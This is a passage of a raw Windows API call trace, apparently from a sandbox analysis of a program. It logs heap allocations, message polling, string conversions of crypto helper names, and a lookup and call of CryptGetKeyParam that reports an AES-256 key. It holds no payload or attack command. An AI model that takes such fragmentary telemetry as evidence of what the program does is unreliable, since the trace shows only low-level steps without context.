(HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0086.834] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0086.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0086.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0086.834] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0086.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0086.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0086.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0086.835] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0086.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0086.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0086.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0086.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0086.835] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0086.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0086.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0086.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.836] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0086.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0086.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0086.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0086.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0086.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0086.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0086.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0086.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0086.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0086.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0086.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0086.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0086.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0086.837] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0086.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0086.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0086.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0086.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0086.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0086.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0086.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0086.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0086.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0086.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0086.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0086.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0086.837] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0086.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0086.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0086.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0086.838] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0086.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0086.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0086.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0086.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0086.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0086.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0086.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0086.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0086.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0086.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0086.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0086.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0086.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0086.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0086.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0086.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0086.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0086.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0086.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0086.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0086.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0086.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0086.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0086.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0086.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0086.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0086.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0086.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0086.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0086.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0086.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0086.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0086.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0086.840] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0086.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0086.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0086.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0086.841] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0086.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0086.842] CryptGetKeyParam (in: hKey=0x41ac280, dwParam=0x7, pbData=0x43e25c0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e25c0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0086.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: 